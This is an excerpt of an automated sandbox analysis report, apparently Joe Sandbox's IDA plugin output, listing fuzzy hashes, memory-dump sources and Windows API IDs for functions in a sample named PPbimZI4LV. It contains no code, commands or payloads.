                                                                      • Opcode Fuzzy Hash: 2f2a7f0b4b99b489bd401bf82ee2ae899ba245d3bdd8c743c662dd8b12cd4bc5
                                                                      • Instruction Fuzzy Hash: B7414962B0CA4286FB10BF61D0823AC23A1EB58B88F544535CA0DE7B96EF7CE455E340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                      • String ID:
                                                                      • API String ID: 3947729631-0
                                                                      • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                      • Instruction ID: e9f266c90b5afcabe72790d3ad369d665dbb22462d257331ce422dd5028ac621
                                                                      • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                      • Instruction Fuzzy Hash: C241AE21E0D65282FB64FB15D85327823A1AFA5B54F444039DA1EF76D7EF3EE881A340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                      • Instruction ID: a13d5874a86950a3747d0db96c58a5ffee6c081f2f1f6ab39c84687133b834c6
                                                                      • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                      • Instruction Fuzzy Hash: C9219823A1C69281EA91BF11940217E5260BF45B85F244030EF4DEBB87EF7CD981AB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                      • Instruction ID: 57ddc6185dc697296abcf65677451a37a8a156b7938302728a4884b762ca725d
                                                                      • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                      • Instruction Fuzzy Hash: 2C21C73361D64287EB65BF24E85237976A0EB80B90F145234DA5EE66D7EF2CD840DB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                      • Instruction ID: e61b3601e4d53947e319f63bae42c44a111c7f77f909c448aaa8490b411203cd
                                                                      • Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                      • Instruction Fuzzy Hash: 1D115B33E5C683C2F720BF51A4421B966A5FB44381F544035EA8DEB79BEF2DE881A710
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                      • Instruction ID: f37cf8186cf8602da71042eeb8e1f2219edb8c0f2bbc50e61dc9e86735f147ec
                                                                      • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                      • Instruction Fuzzy Hash: 73115E26B1CA8682EB84BF15D0813786360EB84F94F145232DE5E973A6DF3CD4909700
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                      • Instruction ID: d28256de375903eb62c716b347c8f5c4a0063eda62bf619d2ee433fda1b18314
                                                                      • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                      • Instruction Fuzzy Hash: B611C17290D64696EA55BF10D4822AD7761FF80362F904132E64EEA3D7EFBCD045DB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                      • Instruction ID: f5bc0faaf579f38732b338260b2f31559160e9fcf8220620243a8f5b0df69a98
                                                                      • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                      • Instruction Fuzzy Hash: 75014F23E0D20741FE64BB65A4633B911905F95B75F341630E92EEB2D3EF6CE882A741
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                      • Instruction ID: 02879bcfbc9948ab70abc32559b5ba43954a491dcc9ff95a843dc229cecd3ad3
                                                                      • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                      • Instruction Fuzzy Hash: 1EF0B423A1C21382E9A47B65B42317E22909F40B51F381130E95EE66C7EF2CE882B701
                                                                      APIs
                                                                        • Part of subcall function 00007FF643954970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643954999
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF64396C8FE), ref: 00007FF64392656F
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3938577545-0
                                                                      • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                      • Instruction ID: 8e29fb1a6a84fdc2063271e86ef9e185ddf0cd68ec5498201020c4863ba69b07
                                                                      • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                      • Instruction Fuzzy Hash: 2FF03A53A0DA058AFF19FF65C06777822A0AB58F08F140930CA0EDA58AEFACD458E341
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                      • Instruction ID: 2063f0c610dad3281cd42db11ab8dd22ef38412e940870ea5bbb5049ee160f4f
                                                                      • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                      • Instruction Fuzzy Hash: 76E03922608A9183D720DF06F44131AE370FB89BC8F544525EF8C97B1ACF7DC5518B80
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath
                                                                      • String ID:
                                                                      • API String ID: 82841172-0
                                                                      • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                      • Instruction ID: 64513e2a96897548a1ec5e83d08470e40c4738a6cc18de4492e1b9e67fa8e5fc
                                                                      • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                      • Instruction Fuzzy Hash: 7AE01222B0C64585DB61A76AE6463A96365BB8C7C4F544031EE8C9375BDE6CC5858B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                      • Instruction ID: cb4a4d5720fd6f7d7963a24cd844abc7e5cfa0988b2001be519a3712e122ed3e
                                                                      • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                      • Instruction Fuzzy Hash: 64F05872A1DB8687E7A1BB54E4463A97AA4F788308F844039D18DA639ADE3CD345DF10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Open_onexit
                                                                      • String ID:
                                                                      • API String ID: 3030063568-0
                                                                      • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                      • Instruction ID: f14c960c0338d3db59d24b3ebfb824b375e413d68c3ffa966e6b7f90414c7a32
                                                                      • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                      • Instruction Fuzzy Hash: CCE012A0F5E64B80EE04F76AD88717417906F75709F90A536D01DE2357FE2CD295A710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentVersionWow64_onexit
                                                                      • String ID:
                                                                      • API String ID: 2932345936-0
                                                                      • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                      • Instruction ID: ff26638964f98b75ac870980b9ebd3dcbd7b50df481d1a91345d0355758f5e54
                                                                      • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                      • Instruction Fuzzy Hash: 89C01201E6E08B80E60873B648870B401A04FB5308FA0113AC13DD0283FD0C51E62611
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _onexit
                                                                      • String ID:
                                                                      • API String ID: 572287377-0
                                                                      • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                      • Instruction ID: 2c68dbe15f4a9a997a521e06f4c4568614e3d535790e1132957203d4ecad59dd
                                                                      • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                      • Instruction Fuzzy Hash: E6C01201E6F44B80E50873B64C870B801900FF5304FA01579C01DE1293FD1C51E66611
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _onexit
                                                                      • String ID:
                                                                      • API String ID: 572287377-0
                                                                      • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                      • Instruction ID: 929fd89ef884b09bb9a6f838003c2f2ea54e02d80cb97ccc5bccc8a478ac2596
                                                                      • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                      • Instruction Fuzzy Hash: 14C00211E5E54B81E91877BA48870B501905FB9314FA01975D11DE1293FD1C51E66751
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                      • Instruction ID: 287e3a570afd6e5f8d55d33381a0edf18ab9d2c1c8ffa6800fd961a4d5cc5ca7
                                                                      • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                      • Instruction Fuzzy Hash: 9A715822B08A4285EB10FF65D5923EC27A0EB48B84F444536DE1EE77A7EF38D545D350
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      • Opcode ID: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                      • Instruction ID: 78df880b8ed1a7a676212dc99a33cdc233c798070959317bd1a23f5e3145553a
                                                                      • Opcode Fuzzy Hash: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                      • Instruction Fuzzy Hash: 9DF09006B4E207C0FE98BB6258133B512909F94B81F4C8030C90EEA7D3FE2CE4C5A360
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                      • Instruction ID: aaabdbdaae4607c33742c6289f1699c424f19c831c34f5680ead657765062c9c
                                                                      • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                      • Instruction Fuzzy Hash: 6BF0FE42B0D24785FE55BFB1684367951D05F45BA2F484634E92EE92C3FE5CE4C2AB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
